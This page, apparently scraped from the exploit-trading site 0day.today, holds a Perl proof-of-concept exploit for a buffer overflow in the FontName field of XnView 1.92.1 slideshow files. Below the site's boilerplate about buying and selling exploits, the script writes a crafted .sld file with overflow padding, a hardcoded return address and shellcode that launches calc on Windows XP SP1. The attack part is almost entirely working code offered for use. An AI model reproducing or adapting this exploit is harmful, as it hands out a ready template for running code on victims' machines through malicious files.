0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit
========================================================== XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit ========================================================== #!/usr/bin/perl # ================================================================ # XnView 1.92.1 Slideshow "FontName" Buffer Overflow # ================================================================ # # Calc execution POC Exploit for WinXP SP1 pro English # # Found by : Stefan Cornelius, Secunia Research # Advisory : http://secunia.com/secunia_research/2008-6/advisory # # Exploit by : haluznik | haluznik<at>gmail.com # # 04.01.2008 ..April Fools Day ;) # ================================================================ print "\n [*] XnView 1.92.1 Slideshow exploit by haluznik\n\n"; my $head= "\x23\x20\x53\x6c\x69\x64\x65\x20\x53\x68". "\x6f\x77\x20\x53\x65\x71\x75\x65\x6e\x63". "\x65\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d". "\x65\x20\x3d\x20\x22"; $fontname = "A" x 32 . "\xcc\x59\xfb\x77"; my $shellcode= "\x33\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b". "\x50\x53\xb9\x44\x80\xc2\x77\xff\xd1\x50". "\xbb\xfd\x98\xe7\x77\xff\xd3"; my $tail= "\x22\x0d\x0a\x22\x43\x3a\x5c\x74\x65\x73". "\x74\x2e\x6a\x70\x67\x22\x0d\x0a"; $sld = $head . $fontname . $shellcode . $tail; print " [+] Creating poc.sld file..\n"; open(file,">poc.sld") || die " [-] cannot write file\n"; print(file $sld); close(file); print " [*] Done!\n"; # 0day.today [2024-12-24] #